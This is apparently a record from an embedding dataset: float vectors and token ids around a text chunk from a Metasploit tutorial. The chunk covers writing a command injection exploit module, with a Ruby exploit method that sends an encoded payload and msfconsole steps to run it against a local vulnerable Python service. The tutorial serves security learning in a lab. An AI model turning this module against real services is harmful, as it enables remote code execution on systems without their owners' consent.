-0.20375171303749084, 0.35969972610473633, -0.4846218228340149, -0.8263029456138611, 0.6896288990974426, -0.9449246525764465, 0.05882578343153, -1.079783320426941, -0.43497318029403687, 0.7819791436195374, -0.04934168979525566, -0.04219349846243858, 0.42697829008102417, -0.9006173610687256, 0.15712200105190277, 0.004587344825267792, 0.5524306893348694, -0.43452632427215576, 0.4970953166484833, 0.2776581943035126, -0.21151091158390045, 0.2698061764240265, 0.15837642550468445, -0.1258174479007721, -0.019048726186156273, -0.4254705309867859, -0.26728466153144836, 0.5174288749694824, -0.017856812104582787, 0.8072397112846375, 0.2086464911699295, 0.7681581974029541, -0.4237445890903473, -0.12414013594388962, 0.16140297055244446, 0.24393947422504425, -0.11800184100866318, -0.33604222536087036, -0.18653756380081177, -0.2763324975967407, -0.6859111189842224, -0.24794331192970276, 0.1281358301639557, 0.03062073513865471, 0.6374655961990356, -0.14535413682460785, 0.41665413975715637, 0.1631792038679123, -0.02746797353029251, 0.5929180383682251, -0.8731048703193665, -0.7438161969184875, 0.5890495777130127, -0.14086920022964478, 0.9818170666694641, -0.6854541897773743, -0.6549579501152039, 0.3140988349914551, -0.3467405140399933, 0.3571857213973999, 0.553381621837616, -0.29134610295295715, -0.6760342121124268, -0.7924830317497253, 0.08362952619791031, 0.0029563037678599358, 0.19823269546031952, -0.14233751595020294, -0.22509197890758514, -0.03963681682944298, -0.7534634470939636, -0.6325551271438599, 0.4208272695541382, 1.4063705205917358, 0.3736843168735504, 0.3333419859409332, 0.38825175166130066, 0.01992528699338436, -0.6858022809028625, 0.36297082901000977, 0.016884639859199524, 0.04032891243696213, -0.11002914607524872, 0.30020835995674133, -0.3700637221336365, 0.7753677368164062, -0.5246844291687012, -0.1758468747138977, -0.34972259402275085, 0.4914677143096924, 0.18472345173358917, 0.4014650881290436, -0.11256573349237442, -0.3242923319339752, 0.16212138533592224, -0.09263022243976593, -0.07989032566547394, -0.6333624124526978, -0.5870299935340881, 0.7613278031349182, 0.07429560273885727, -0.39693084359169006, -0.6596872806549072, 0.0069884792901575565, -0.421580970287323, 0.2984482944011688, 0.08775597810745239, -0.2197885513305664, -0.7336896061897278, -0.5838369131088257, -1.1734509468078613, 0.011279546655714512, 0.5669152140617371, -0.029112525284290314, 0.47682926058769226, -0.44794657826423645, -0.31600648164749146, 0.17029312252998352, -0.052173927426338196, -1.1482336521148682, -0.9486172199249268, 0.43997612595558167, 0.14650927484035492, 0.9026067852973938, -0.8356468081474304, -0.6381173729896545, -0.3503209352493286, -0.717156171798706, 0.24302871525287628, -0.7477753162384033, 0.5929909348487854, 0.434521347284317, -0.1896360218524933, 0.5166266560554504, -0.22015121579170227, -0.2713712453842163, 0.17034366726875305, -0.25908657908439636, 0.6081346869468689, -0.543018639087677, -0.15304793417453766, 0.45214924216270447, 0.005641529802232981, -0.1260361671447754, 0.22881464660167694, 0.5611254572868347, -0.0297122523188591, -0.03164585307240486, -0.1548447459936142, -0.4186598062515259, 0.09650418162345886, -0.8838791251182556, 0.7064383029937744, -0.17087188363075256, -0.30969005823135376, 0.20754878222942352, -0.14183591306209564, 1.1884706020355225, -0.17358870804309845, 0.172279953956604, -0.5813889503479004, -1.117206335067749, 0.10843563079833984, 0.22666795551776886, 0.10663875192403793, 0.4356188476085663, -0.2820616662502289, -0.5276756882667542, -0.23887936770915985, -0.2445141226053238, -0.6753242611885071, -0.49095895886421204, 0.1634385585784912, -0.1779842972755432, -0.14753785729408264, 0.21429342031478882, 0.3256263732910156, -0.6672759056091309, -0.734241783618927, 0.5441896319389343, -0.2168872207403183, 0.06642287224531174, -0.5080618858337402, -0.1779775619506836, -0.2514440417289734, 0.2425718903541565, -0.5134267807006836, 0.21139614284038544, -0.547819972038269, 0.19620533287525177, 0.4234554171562195, 0.7294328808784485, 0.7109121084213257, 0.02593960613012314, -0.6417575478553772, 0.6599876284599304, -0.06563038378953934, -0.5327783823013306, -0.5073103308677673, 0.37761107087135315, -0.27917250990867615, 0.233406662940979, 0.0495866984128952, -0.38359585404396057, -1.1284548044204712, -0.3581421971321106, 0.20473875105381012, 0.4509951174259186, -0.18449436128139496, -1.2236933708190918, -0.4179171919822693, -0.1823762208223343, 0.5042204260826111, 0.08063849806785583, -1.3355389833450317, -0.4768886864185333, 0.11661045253276825, 0.41842952370643616, -0.23209638893604279, 0.237837016582489, -0.2907959818840027, -0.4385018050670624, -0.4877668619155884, 0.7317602038383484, 0.04108455032110214, -0.07929973304271698, -0.6526872515678406, 0.43269217014312744, 0.557986319065094, 0.08225435018539429, -0.5706596374511719, -0.49956458806991577, -0.7641012072563171, -0.01200280524790287, -0.5760173797607422, 0.341031938791275, -0.6571772694587708, 0.5855336785316467, -0.2937474250793457, 0.18653056025505066, 0.10824283212423325, -0.35631972551345825, -0.16527755558490753, 0.3417988717556, 0.4691350758075714, -0.567955732345581, -0.06549819558858871, -0.4946140944957733, 1.0671825408935547, 0.1610933542251587, -0.10200135409832001, -0.890791118144989, 0.2934512794017792, -0.856247067451477, -1.3047958612442017, 0.3808850646018982, 0.10526476055383682, -0.6680998802185059, 0.21640624105930328, -0.08668350428342819, 1.2475398778915405, -1.1282747983932495, 0.7541593909263611, 0.9981999397277832, 0.3868005871772766, 0.15038937330245972, -0.5491076111793518, 0.5969458818435669, 0.3623630106449127, -0.7907077074050903, 0.22949756681919098, 0.3452853262424469, 0.0011643541511148214, -0.620513916015625, -0.28526461124420166, 0.2888278663158417, -0.4568856358528137, -0.33564549684524536, 0.7371503710746765, -0.1528785079717636, 0.32706135511398315, -0.08138386160135269, -0.46503007411956787, -0.48508909344673157, 0.04116126522421837, 0.5980304479598999, -0.3901062607765198, 0.5908848643302917, 0.60102379322052, 0.5107280015945435, -0.2270495444536209, -0.3084239661693573, 0.2580984830856323, -0.46214693784713745, 0.7858180999755859, 0.31694328784942627, -0.8628900647163391, 0.8615962266921997, 0.5140499472618103, -0.47106045484542847, -0.6369365453720093, -0.3867417871952057, -0.23361417651176453, 0.020984962582588196, 0.1886577606201172, -0.46633633971214294, 0.09252845495939255, 0.011665337719023228, 0.13580910861492157, 0.20439162850379944, -0.16389420628547668, 0.05821915343403816, -1.0359516143798828, 0.06717901676893234, -0.31147849559783936, -0.059773754328489304, 0.7369009852409363, -0.37768447399139404, 0.13515427708625793, -1.0236207246780396, -0.1271997094154358, 0.19783847033977509, -0.5016654133796692, 1.3437367677688599, 0.22681020200252533, 0.18252253532409668, -0.12609487771987915, 0.3036137521266937, 1.1281877756118774, 0.01670646481215954, -0.051926251500844955, 1.0832970142364502, -0.39253535866737366, -1.0815341472625732, 0.028697585687041283, 0.13957549631595612, 0.09648041427135468, 0.39065489172935486, -0.250919908285141, -0.17042618989944458, 0.057921916246414185, 0.5906615257263184, 0.11513175070285797, -0.4281454384326935, -0.6632216572761536, -0.49783363938331604, -0.45501333475112915, 0.0069506545551121235, -0.3918282687664032, -0.05829847604036331, 0.37017112970352173, -0.5942988395690918, -0.16663828492164612, -0.519383430480957, 0.24143493175506592, -0.018214751034975052, -0.7175525426864624, -0.8261532783508301, 0.8048946857452393, -1.1026254892349243, -0.266857773065567, -0.6372758746147156, 0.2254093885421753, -0.11632999777793884, -0.4770587086677551, -0.339577853679657, -0.21436971426010132, -0.47994479537010193, 0.5131365656852722, -0.5334832072257996, 0.0819820761680603, 0.05412420257925987, -0.9045721292495728, 0.7324801683425903, -0.2597341239452362, -0.40928003191947937, 0.4703015685081482, 0.16346204280853271, -0.3823114335536957, 0.1300986260175705, -0.41051575541496277, -0.16298098862171173, -0.5057063698768616, -0.3972790241241455, 0.2716566324234009, 0.2624792754650116, -0.482638955116272, 0.18194445967674255, 0.1762343943119049, -0.45573538541793823, -0.24525660276412964, -0.8699071407318115, -0.2117987722158432, 0.3385630249977112, -0.13718944787979126, 0.29182228446006775, 0.754035472869873, 0.0777159333229065, 0.20773260295391083, -1.0122066736221313, 1.1046680212020874, 0.8999480605125427, 0.3356230854988098, 0.35274428129196167, -0.018619893118739128, 0.06950441002845764, 0.18746092915534973, 0.43510159850120544, 0.5382073521614075, -0.42069292068481445, 0.5379958748817444, -0.7659634351730347, 0.12984004616737366, -0.45037850737571716, -0.3767188787460327, 0.3692033588886261, 0.31136420369148254, -0.30343183875083923, 0.06470125168561935, 0.5220211148262024, 0.35324016213417053, 0.279457151889801, -0.12523168325424194, -0.9395817518234253, -0.4893968403339386, 0.25691327452659607, -0.48050224781036377, -0.9753085374832153, -0.6730959415435791, -0.527837872505188, -0.47834300994873047, 0.2986263334751129, 0.17746207118034363, 0.779323399066925, 0.02896910160779953, 0.32033517956733704, 1.2078900337219238, -0.3026381731033325, -0.7976853847503662, 0.10203324258327484, 0.43081799149513245, -1.0576404333114624, -1.3007595539093018, 0.4340381622314453, 1.1459659337997437, 0.26403212547302246, -0.37907537817955017, -0.4002135694026947, 0.3863413631916046, 0.3639608919620514, 0.2151070535182953, 0.13143247365951538, 0.14574161171913147, -0.9730015993118286, 0.4570980966091156, -0.5162387490272522, 0.13843455910682678, 0.25225701928138733, 0.03848547115921974, 0.8639670014381409, -0.625881016254425, -0.4604172110557556, 0.5880740284919739, 0.09110310673713684, 0.029179267585277557, 0.2857488691806793, 0.7042679190635681, 0.38779956102371216, -0.4134826362133026, 0.5175365209579468, 0.05570606142282486, 0.5252156257629395, 0.4591771960258484, 0.5204119086265564, -0.5805144906044006, 0.12649507820606232, 0.2051244080066681, -0.5091587901115417, -1.1542404890060425, 0.4223161041736603, -0.26176443696022034, -0.5738877058029175, 0.26501351594924927, -1.2429701089859009, -0.5078904628753662, -0.24342015385627747, -0.15560778975486755, 0.3821954131126404, -0.34587612748146057, 0.05539250746369362, -0.9101696014404297, -0.43221086263656616, 0.7937003970146179, -0.16200798749923706, -0.033372197300195694, 0.29511693120002747, 0.20152901113033295, 0.6175592541694641, 0.5810189247131348, -0.8160312175750732, 0.28110527992248535, 0.5536052584648132, 1.1250826120376587, -0.02812679298222065, 0.21959908306598663, -0.4010339081287384, 0.3510124385356903, -0.03863426670432091, 0.04364851862192154, -0.719635546207428, 0.5315066576004028, -0.009956101886928082, -0.6691024303436279, -0.6931480169296265, 0.4877866506576538, 0.14646470546722412, -0.06251827627420425, 0.02073286846280098, 0.6012527942657471, 0.4713986814022064, -0.14807671308517456, 0.8489384651184082, -0.5488065481185913, -0.03733532875776291, 0.3305235207080841, -0.16255024075508118, -0.8468572497367859, 1.1088846921920776, -0.12930120527744293, 1.2345980405807495, -0.12383919954299927, 0.5776939988136292, -0.07338427752256393, 0.8252223134040833, 0.2504621744155884, -0.7938617467880249, -0.14522331953048706, 0.45537784695625305, 0.3879327178001404, -0.5591365694999695, 0.2847230136394501, -0.028619112446904182, 0.24209558963775635, -0.08829329907894135, -0.1914958655834198, -0.7460988163948059, 0.17069102823734283, -0.0051868450827896595, -0.5220271348953247, 0.9512974619865417, -0.13804693520069122, -0.8225669860839844, -0.21802912652492523, 0.14177919924259186, 0.32593637704849243, 0.3742011487483978, -0.06632562726736069, -0.32499462366104126, 0.023355690762400627, -0.1232546865940094, -0.22622054815292358, 0.7855812311172485, -0.5016261339187622, -0.17843762040138245, -0.36259016394615173, -0.42425835132598877, -0.2440589815378189, 0.1261305809020996, -0.43660691380500793, -0.3119962513446808, 0.7273269891738892, 0.8520108461380005, 1.1615004539489746, 0.010864892043173313, -0.13908202946186066, -0.24765251576900482, 0.44232749938964844, 1.0980184078216553, -0.4708606004714966, 0.9267495274543762, 0.5927383303642273, -0.19547170400619507, 0.7570586204528809, -0.2502184212207794, 0.5616151094436646, -0.3830469846725464, -0.3108161985874176, -0.09561274200677872, -0.34749865531921387, -0.929603099822998, -0.7587807774543762, 0.06205075979232788, 0.2799094617366791, 0.25950950384140015, 0.25112685561180115, -0.7995935678482056, 0.15769098699092865, -0.07773454487323761, -0.17562928795814514, -0.4637193977832794, 0.13906247913837433, -0.07465611398220062, -0.33501705527305603, 0.9898735880851746, -1.2339893579483032, 4.099976539611816, 0.36895444989204407, 0.4976605176925659, 0.19103172421455383, 0.33137622475624084, 0.7632706761360168, 0.9292793869972229, -1.0480860471725464, 0.2751408517360687, -0.6643242239952087, 0.14276228845119476, -0.4871479868888855, 0.07437702268362045, 0.8345940113067627, 0.2719632089138031, 0.1505882292985916, -0.6346642971038818, -0.18733848631381989, 0.8123531937599182, -0.4571997821331024, -0.8537073135375977, -0.2703206241130829, -0.1699114441871643, 1.296877145767212, 0.03064039535820484, -0.2019997388124466, 0.34679609537124634, -1.027685523033142, 0.3294549286365509, -0.86555415391922, 0.5938316583633423, -0.027477137744426727, 0.3032230734825134, 0.3879030644893646, -0.5623501539230347, -0.17541295289993286, 0.5104320645332336, -0.4020317494869232, -0.734146773815155, -0.8779515027999878, 0.5789591073989868, -0.1450938731431961, -0.11902385205030441, -0.5472016334533691, 0.47828537225723267, 0.35192105174064636, -0.502254068851471, 0.7419866323471069, 0.5862062573432922, -0.49460795521736145, 1.3682039976119995, 0.020557479932904243, 0.5570327639579773, 0.09507617354393005, -0.5064612030982971, 0.9398127198219299, 0.5542959570884705, -0.23440025746822357, -0.6838151216506958, 0.06490729749202728, 0.0017444099066779017, -0.2684550881385803, 0.05799981206655502, 0.29938629269599915, -0.3861108720302582, 0.33710750937461853, -0.6143974661827087, 0.3964582085609436, 0.25125768780708313, 0.6904216408729553, -0.5520878434181213, 0.45465001463890076, -0.20257630944252014, -0.5719712972640991, 0.6949371099472046, 0.20501196384429932, -0.1950359344482422, 0.22682933509349823, 0.2475135773420334, -0.022069815546274185, -1.0794821977615356, -0.3343718945980072, -1.334338903427124, 0.12757432460784912, 0.8910753130912781, 0.321719765663147, 0.05720122903585434, -0.8955880999565125, 0.17845548689365387, 0.027157191187143326, 0.7994402647018433, 0.1032906100153923, -0.6014510989189148, 0.30474942922592163, 0.14082935452461243 ]
[ 1010, 1065, 1065, 1033, 1010, 1005, 18093, 1005, 1027, 1028, 1063, 1005, 2919, 7507, 2869, 1005, 1027, 1028, 1005, 1032, 1060, 8889, 1005, 1010, 1065, 1005, 3964, 1005, 1027, 1028, 1063, 1001, 3223, 2005, 2047, 14184, 24471, 2140, 1005, 9211, 1005, 1027, 1028, 1031, 5823, 1035, 3647, 1033, 1010, 1005, 15258, 1005, 1027, 1028, 1031, 9377, 3085, 1035, 5219, 1033, 1010, 1005, 2217, 12879, 25969, 2015, 1005, 1027, 1028, 1031, 25941, 1035, 1999, 1035, 15664, 1033, 1065, 1001, 2070, 2062, 27425, 7047, 2024, 2182, 1024, 24471, 2140, 1007, 1007, 2203, 2035, 2008, 2023, 4118, 2515, 2003, 4236, 27425, 2000, 1996, 11336, 1012, 22910, 4183, 1521, 1055, 2590, 2000, 5676, 2008, 18093, 2015, 2108, 2741, 2024, 7919, 12359, 1012, 2004, 2019, 2742, 1010, 2065, 2017, 4604, 1037, 5227, 2000, 1996, 1013, 17852, 2203, 8400, 2008, 3504, 2066, 1013, 17852, 1029, 12997, 1027, 1015, 1012, 1015, 1012, 1015, 1012, 1015, 1004, 1004, 8909, 1010, 2017, 2180, 1521, 1056, 2156, 1996, 1523, 21318, 2094, 1027, 6694, 1006, 18804, 1007, 21025, 2094, 1027, 6694, 1006, 18804, 1007, 1524, 1999, 1996, 3433, 2138, 1004, 2003, 1037, 2569, 2839, 1999, 8299, 1012, 17181, 5918, 2453, 2689, 2241, 2006, 1996, 4646, 2017, 1521, 2128, 2667, 2000, 1999, 20614, 1010, 2061, 7551, 2065, 2477, 4995, 1521, 1056, 2551, 1012, 13366, 11307, 1035, 2919, 1035, 25869, 2015, 1006, 4642, 2094, 1007, 2709, 4642, 2094, 1012, 28177, 12083, 1006, 1013, 1004, 1013, 1010, 1005, 1003, 2656, 1005, 1007, 1012, 28177, 12083, 1006, 1013, 1013, 1010, 1005, 1003, 2322, 1005, 1007, 2203, 11307, 1035, 2919, 1035, 25869, 2015, 3138, 1999, 4642, 2094, 1010, 2029, 2003, 1037, 5164, 1012, 4642, 2094, 2038, 2048, 20885, 2015, 4162, 1011, 1996, 2034, 2097, 17637, 1004, 2000, 1003, 2656, 1010, 1996, 2117, 16315, 1037, 2686, 2000, 1003, 2322, 1012, 1996, 1012, 28177, 12083, 8635, 2024, 1037, 3795, 20885, 2408, 1996, 5164, 1010, 2061, 1996, 2972, 18093, 2003, 19209, 2011, 1996, 20885, 2015, 2182, 1006, 2714, 2000, 2358, 2099, 1012, 5672, 1999, 18750, 1007, 1012, 7539, 1997, 3251, 2030, 2025, 1996, 5164, 2003, 6310, 1010, 2009, 2003, 2513, 1012, 7781, 10760, 15389, 1035, 3094, 4118, 3138, 1999, 4642, 2094, 1998, 1035, 23569, 2015, 1998, 15389, 2015, 1996, 3094, 2006, 1996, 4539, 1012, 1999, 2256, 2553, 1010, 23448, 1037, 3094, 2003, 3432, 5815, 1996, 3094, 2000, 1037, 2131, 5227, 1998, 6016, 2009, 2000, 1996, 1013, 17852, 2203, 8400, 2006, 2256, 7099, 2326, 1012, 13366, 15389, 1035, 3094, 1006, 4642, 2094, 1010, 1035, 23569, 2015, 1027, 1063, 1065, 1007, 4604, 1035, 5227, 1035, 1039, 5856, 1006, 1063, 1005, 4118, 1005, 1027, 1028, 1005, 2131, 1005, 1010, 1005, 24471, 2072, 1005, 1027, 1028, 1005, 1013, 17852, 1005, 1010, 1005, 4372, 16044, 1035, 11498, 5244, 1005, 1027, 1028, 6270, 1010, 1005, 13075, 2015, 1035, 2131, 1005, 1027, 1028, 1063, 1005, 12997, 1005, 1027, 1028, 1000, 17620, 1012, 4012, 1003, 2322, 1003, 2656, 1003, 2656, 1003, 2322, 1001, 1063, 11307, 1035, 2919, 1035, 25869, 2015, 1006, 4642, 2094, 1007, 1065, 1000, 1010, 1065, 1065, 1007, 2203, 2057, 2123, 1521, 1056, 2130, 2342, 2000, 5047, 1996, 6434, 1997, 4604, 1035, 5227, 1035, 1039, 5856, 1006 ]
metasploit
109.txt
3
really, there should be no return until the shell exits, since the call to subprocess. run doesn ’ t return until that shell dies ). exploitationto finish up, all we need is to define the exploit method. this method is called by metasploit when you use run within a msfconsole. all that we ’ ll do here is print a little status message and run the exploit, but later you can modify this method to handle droppers as well : def exploit print _ status ( " executing # { target. name } for # { datastore ['payload'] } " ) execute _ command ( payload. encoded ) end if you ’ re running metasploit and the vulnerable python service on the same machine, you should be able to simply set the variables and fire : set rhost 127. 0. 0. 1 set lhost 127. 0. 0. 1 run conclusionthat ’ s it. put it all together and you have a very simple command injection exploit module that shows you the basics of how to throw a payload. play around with different payloads, follow the how - to - use - command - stagers guide, add some logging to the python web server, and watch executions over wireshark. you ’ ll learn a lot. [SEP]
[ 0.3142314851284027, 0.05760374665260315, -0.6386615633964539, 0.30448243021965027, -0.3289664387702942, -0.33457404375076294, -0.5118706822395325, 0.5230990648269653, 0.47589111328125, 0.6136826872825623, -0.21886174380779266, 0.3297167718410492, 0.25349611043930054, -0.12381463497877121, -0.09153982251882553, 0.32071635127067566, 0.366910457611084, -0.7893105745315552, -0.7149704694747925, 0.3800762891769409, -0.06720436364412308, -0.0817769393324852, -0.2784178853034973, -0.505075991153717, -0.5723685622215271, -0.3213757276535034, -0.6779195666313171, -0.4660913944244385, 0.9783473610877991, 0.6662639379501343, -0.05436624959111214, 0.15334589779376984, 0.5392910242080688, -1.0343691110610962, 0.7833088636398315, -0.2193831205368042, 0.38172054290771484, -0.26464465260505676, -0.5959407687187195, -0.9522660374641418, 0.021594783291220665, 0.12185530364513397, -0.038650032132864, 0.00006272332393564284, -0.5641481280326843, 0.05876794829964638, 0.050946176052093506, 0.506106436252594, 0.341126412153244, 0.4052983820438385, 0.3734017610549927, 1.08376944065094, -0.42288246750831604, -0.6813332438468933, -0.2912151515483856, -0.1300458312034607, -0.1713307946920395, 0.25249895453453064, -0.3310059905052185, -0.15594708919525146, 0.16651266813278198, 0.16899938881397247, -0.2649594247341156, -0.9674654006958008, -0.08418627083301544, 0.558405876159668, -0.27485331892967224, -0.3478362262248993, -0.5923340916633606, -0.4775199592113495, 0.03423401713371277, 0.7296856641769409, -0.10370896756649017, -0.8154280185699463, -0.19286860525608063, 0.26953887939453125, 0.09149453043937683, 0.1200791522860527, 0.020364968106150627, 0.9538514018058777, -0.19758817553520203, 0.7610101103782654, 0.627120852470398, -0.8254117965698242, 0.21672305464744568, -0.529253363609314, 0.35528135299682617, -0.4430203437805176, 0.060182731598615646, 0.2296082079410553, 0.34341171383857727, 0.12555629014968872, -0.16185365617275238, -0.22012412548065186, -0.10194702446460724, 0.38979479670524597, -0.4340954124927521, 0.5254896283149719, 0.0436696782708168, 0.5077588558197021, 0.4728822112083435, 1.1244757175445557, -0.4127967655658722, 0.6066921353340149, -0.16158249974250793, 0.8424202799797058, 1.4182449579238892, -0.30167967081069946, -1.2182393074035645, 0.07901901006698608, 0.0702122151851654, 0.09684478491544724, -0.27448898553848267, -0.08011359721422195, -0.11046763509511948, 0.44120025634765625, 0.3368681073188782, -0.23063892126083374, -0.29857712984085083, 0.14618822932243347, 0.6314956545829773, -0.4394887387752533, -0.15828116238117218, -0.7719149589538574, -0.04711508750915527, -0.20542652904987335, -0.4149859845638275, 0.7774598598480225, -0.34655848145484924, -0.3732413947582245, -0.5414303541183472, 0.000632319541182369, 0.35881274938583374, 0.8991807103157043, -0.19880402088165283, 0.5250760912895203, -0.31836116313934326, -0.03151930496096611, 1.493248701095581, -0.34166398644447327, 0.18246112763881683, -0.04902684688568115, 0.5311753749847412, 1.4821780920028687, 0.07356539368629456, -0.36717063188552856, 0.33885663747787476, 0.26152223348617554, -0.46870821714401245, 0.6361656188964844, -1.1626518964767456, -0.0075849248096346855, 0.43229174613952637, 0.09462327510118484, 0.5970075130462646, -0.16011419892311096, -0.8017991781234741, 0.5403584241867065, -0.4980965256690979, 0.5659262537956238, 0.0041710976511240005, 0.19963985681533813, -0.5107854604721069, 0.4532180428504944, -0.053722646087408066, 0.14938320219516754, -0.8676276803016663, -0.5913512706756592, -0.5132177472114563, -0.2601226568222046, 1.0551949739456177, -0.46422138810157776, -0.05701955780386925, 0.29676440358161926, 1.003702163696289, 0.5151640772819519, -0.19431987404823303, 0.3028714954853058, 0.11965492367744446, 0.39238131046295166, -0.634688138961792, 0.7430251240730286, 0.2592002749443054, 0.6759099364280701, 0.7388727068901062, -0.38353294134140015, 0.7465860247612, -0.09431954473257065, -0.27421340346336365, -0.3563343584537506, 0.40818485617637634, 0.47127097845077515, -0.39386671781539917, 0.09070369601249695, -0.16128654778003693, -0.03149867057800293, -0.28858742117881775, 0.4606206715106964, -0.5749548673629761, -0.07077290117740631, -0.518980860710144, 0.12243523448705673, -0.6580834984779358, 0.3618142604827881, -0.07545307278633118, -0.2982851564884186, 0.8436511754989624, 0.6356184482574463, 0.0046130153350532055, -0.21252308785915375, 0.29716596007347107, 0.14030367136001587, -0.9411402344703674, -0.5446451306343079, 0.05697179585695267, -0.28974649310112, -0.6987059116363525, -0.04333875700831413, 0.03705330193042755, 0.16855287551879883, -0.2626386880874634, 0.3433910310268402, 0.011556240729987621, 0.13422271609306335, -0.23908968269824982, -1.0390653610229492, -0.30637064576148987, 0.4775855243206024, 0.09196657687425613, 0.6998744606971741, 0.1633269041776657, 0.5451242327690125, -0.4013088047504425, 0.8457222580909729, 0.26087579131126404, -0.1802062839269638, 0.5554152727127075, 0.3024836778640747, -0.6362229585647583, 0.5064305067062378, 0.2636796534061432, 0.4288910925388336, -0.5165570974349976, 0.026366522535681725, 0.11281876266002655, 0.5978572368621826, 0.19866549968719482, 0.0806427001953125, -0.2966802418231964, 0.5664038062095642, -0.6667207479476929, 0.6662583947181702, -0.07941846549510956, 0.20180192589759827, -0.5955443382263184, -0.4276996850967407, -0.4237760305404663, 0.17297840118408203, -1.2717318534851074, -0.016847098246216774, 0.3014211356639862, 0.28029558062553406, -0.6616308689117432, -0.24213439226150513, 0.25535261631011963, 0.8687244653701782, 0.2986995279788971, 0.00348654598928988, -0.607994556427002, -0.07585430145263672, -0.21553213894367218, 0.09662998467683792, -0.47103992104530334, -0.034246768802404404, -0.7682657241821289, -0.036971643567085266, 0.21750783920288086, -0.48191630840301514, -0.25363391637802124, -0.7786094546318054, 0.693705677986145, 0.49343520402908325, 0.4809177815914154, 0.8011801242828369, 0.3439674377441406, -0.3970905542373657, -0.5349640846252441, -0.3740723729133606, -0.213619202375412, 0.7246221899986267, -0.9160248041152954, 0.15105676651000977, -0.10939474403858185, -0.08930590003728867, -0.2335975021123886, -0.6103515028953552, 0.32617419958114624, -0.1410815715789795, -0.28131499886512756, 0.3855036795139313, -0.1290643811225891, 0.2207746058702469, 0.12245165556669235, -0.23401719331741333, -0.31404581665992737, 0.31422159075737, 0.1278468519449234, -0.26001691818237305, 0.8167932033538818, 0.35877785086631775, -0.6322615742683411, 1.0078489780426025, -0.1522204726934433, -0.004324343521147966, -0.6749383211135864, 0.7112919092178345, -0.0583578385412693, -0.062474776059389114, 0.28522756695747375, -0.8198133111000061, 0.1617782711982727, -0.4363834857940674, 0.469632625579834, -0.4586308002471924, -0.7959256172180176, 0.6040118336677551, -0.25611937046051025, -0.9632059335708618, 0.4230155050754547, -0.59544438123703, 0.5131108164787292, 0.3564318120479584, -0.40063512325286865, 0.29699233174324036, 0.28285226225852966, 0.5426214337348938, -0.9026262164115906, 0.0255595650523901, -0.3649681508541107, 0.2539907693862915, 0.046558935195207596, -0.8274170756340027, 0.5802744626998901, 0.1079571321606636, 0.15156923234462738, -0.013869427144527435, 1.102986216545105, -0.6206339001655579, -0.006477188318967819, -0.44948992133140564, -0.10618853569030762, -0.34148451685905457, 0.43038398027420044, 0.8375084400177002, 0.4956938326358795, 0.9641345739364624, -1.0034093856811523, 0.2262110561132431, -0.046841345727443695, 0.5252322554588318, 0.23981697857379913, 0.2846119999885559, -0.08740121126174927, 0.23958849906921387, -0.4043099582195282, -0.4960404932498932, -0.187830850481987, 0.6896530985832214, 0.7503302693367004, -0.5585001111030579, -0.1398351490497589, -0.6083965301513672, 0.1544594168663025, 0.012316268868744373, -0.2909592092037201, 0.15933506190776825, -0.040455881506204605, -0.3026319444179535, 0.48183074593544006, -0.3893815577030182, -0.13642452657222748, -0.5380719900131226, 0.4050426483154297, -0.04593292996287346, -0.4784567356109619, -0.025938404724001884, -0.6492355465888977, 0.255827397108078, 0.03552723675966263, -0.1279512643814087, -0.34877392649650574, -0.40254658460617065, 0.5362146496772766, -0.19462934136390686, -0.5993126630783081, -0.6744542121887207, 0.5546712279319763, 1.0670500993728638, 1.0476248264312744, 0.3015699088573456, 0.5245568752288818, -0.38688990473747253, -0.278011679649353, 0.4168950617313385, -0.22526815533638, 0.37412622570991516, -0.34993886947631836, 0.865747332572937, -0.0057614874094724655, 0.7374169230461121, 0.304618775844574, 0.2731059193611145, 0.36061012744903564, 0.4391581416130066, -0.699150562286377, -0.16392278671264648, -0.46866855025291443, 1.0841366052627563, 0.2631119191646576, -0.4263480603694916, -0.10331881791353226, -0.4882895350456238, -0.11475745588541031, -0.10337076336145401, 0.9618432521820068, -0.5162052512168884, -0.1330614686012268, 0.07564032077789307, -0.02291511371731758, 0.17747268080711365, -0.33353930711746216, -0.057265087962150574, -0.7686604857444763, -0.31467998027801514, -1.3579314947128296, 0.8201530575752258, 1.3407022953033447, -0.21710211038589478, -0.07066911458969116, -0.37540286779403687, -0.2621382176876068, -0.16836430132389069, -0.11215446144342422, -0.5135297775268555, -0.2821677625179291, 0.06534865498542786, 0.6035307049751282, -0.5730940103530884, -0.12863799929618835, -0.2952258288860321, 0.05484989285469055, -0.7072131037712097, 0.8079599738121033, -0.8580873012542725, 0.5674591064453125, 0.28898289799690247, 0.25052276253700256, -0.12037021666765213, -0.1756303757429123, -0.12526099383831024, -0.10717611759901047, -0.4875485301017761, 0.21788641810417175, -0.8250808119773865, -0.5543373227119446, 0.05474741756916046, 0.23126177489757538, -0.5456534028053284, 0.7620778679847717, -0.08349564671516418, -0.4458860456943512, 0.26964372396469116, 0.6028481721878052, -0.23421399295330048, -0.48567524552345276, -0.2070334404706955, 0.10836519300937653, 0.12257523089647293, -0.11680148541927338, 0.27922573685646057, -0.6248399615287781, 1.6669673919677734, 0.6456246972084045, -0.33043381571769714, -0.07089024037122726, -0.7335349917411804, 0.04082359001040459, 0.06369415670633316, -0.24649576842784882, 0.2666199207305908, -0.6537541747093201, -0.14634840190410614, 0.1265248954296112, -0.1496276557445526, -0.5435104370117188, -0.09481813758611679, 0.4110310971736908, -0.4945986568927765, 0.1677751988172531, 0.2067253291606903, 0.20510810613632202, -0.5653350353240967, -0.26981881260871887, 0.49070069193840027, -0.8103384375572205, -0.3334488272666931, -0.2615985572338104, -0.7865496873855591, 0.2536076009273529, 0.100531667470932, -0.8502138257026672, 0.7328243851661682, -0.6460085511207581, 0.23610353469848633, 0.28052619099617004, 0.2482326477766037, 0.1537972241640091, 0.6964566111564636, -0.10421394556760788, 0.35735103487968445, 0.21029488742351532, -1.026505708694458, -0.01057294849306345, 0.6601930260658264, -0.4944518506526947, 0.8686820268630981, 0.460551917552948, -0.791352391242981, -0.6939855813980103, -0.6898733377456665, 0.3297336995601654, -0.19419170916080475, -0.1673484444618225, -0.611983597278595, -1.0397838354110718, -1.0072040557861328, 0.2733336389064789, 0.4254363477230072, -1.096052646636963, 0.3734962046146393, -0.40653425455093384, 0.34796422719955444, -0.7353051900863647, -0.21869589388370514, -0.12470822036266327, -0.6701855063438416, 0.009671357460319996, 1.1074731349945068, -0.03290272876620293, 0.1533612459897995, -0.3461579382419586, 0.5174736380577087, -0.10954494774341583, 0.525099515914917, -0.21143798530101776, -0.512418270111084, -0.17574647068977356, -0.05714692547917366, -0.1679242104291916, 0.5236734747886658, -0.5261874198913574, -0.28275805711746216, 0.3391692340373993, 0.49618279933929443, 